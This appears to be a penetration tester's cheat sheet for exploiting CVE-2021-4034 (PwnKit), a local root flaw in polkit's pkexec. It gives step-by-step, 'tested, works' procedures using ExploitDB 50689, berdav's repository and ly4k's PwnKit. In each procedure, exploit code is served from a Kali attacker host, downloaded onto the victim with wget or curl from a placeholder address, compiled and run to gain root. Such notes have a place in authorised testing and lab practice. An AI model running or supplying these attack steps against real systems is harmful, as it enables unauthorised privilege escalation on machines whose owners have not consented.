Polkit’s pkexec utility exploit (CVE-2021-4034)

A local privilege escalation vulnerability was found on polkit’s pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies.

ExploitDB 50689

From linpeas

PwnKit

CVE-2021-4034 Detail (NVD)

Check if vulnerable

Vulnerable: pkexec version <= 0.120 (from list on NVD), not official…

pkexec --version

ExploitDB 50689

50689 (ExploitDB)

Requires gcc on victim if not using the compiled version from Kali.

TESTED, WORKS

Create evil-so.c, exploit.c and Makefile

nano evil-so.c
nano exploit.c
nano Makefile
make # if sharing the compiled version
python3 -m http.server 80

wget -O /tmp/evil-so.c http://x.x.x.x/evil-so.c
wget -O /tmp/exploit.c http://x.x.x.x/exploit.c
wget -O /tmp/Makefile http://x.x.x.x/Makefile

/usr/bin/gcc -shared -o evil.so -fPIC evil-so.c
/usr/bin/gcc exploit.c -o exploit
chmod u+x exploit

./exploit

Compiled version

wget -O /tmp/evil.so http://x.x.x.x/50689/evil.so
wget -O /tmp/exploit http://x.x.x.x/50689/exploit
chmod u+x exploit
./exploit

Suggested by linpeas

Option 1 – Compile on the target

Requires gcc on the target. If not, check option 2.

wget https://codeload.github.com/berdav/CVE-2021-4034/zip/main
python3 -m http.server 80

wget -O /tmp/main http://x.x.x.x/main
unzip main
cd CVE-2021-4034-main

Test if vulnerable

make dry-run
dry-run/dry-run-cve-2021-4034

Compile and run the exploit

make
./cve-2021-4034

Option 2 – Compile code on Kali

TESTED, WORKS

On Kali

wget https://codeload.github.com/berdav/CVE-2021-4034/zip/main
cd CVE-2021-4034-main
make
tar -zcvf CVE-2021-4034.tar.gz CVE-2021-4034-main/ 
python3 -m http.server 80

On target

curl -o /tmp/CVE-2021-4034.tar.gz http://x.x.x.x/CVE-2021-4034.tar.gz
gunzip -d CVE-2021-4034.tar.gz
tar xvf CVE-2021-4034.tar
cd cve-2021-4034-main
./cve-2021-4034

PwnKit

https://github.com/ly4k/PwnKit

Option 1 – Compile on the target

TESTED, WORKS

On Kali

wget https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.c
python3 -m http.server 80

On target

curl -o /tmp/PwnKit.c http://x.x.x.x/PwnKit.c
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
chmod u+x PwnKit
./PwnKit

Option 2 – Use pre-compiled version

TESTED, WORKS

On Kali

wget https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit
python3 -m http.server 80

On target

curl -o /tmp/PwnKit http://x.x.x.x/PwnKit
chmod u+x PwnKit
./PwnKit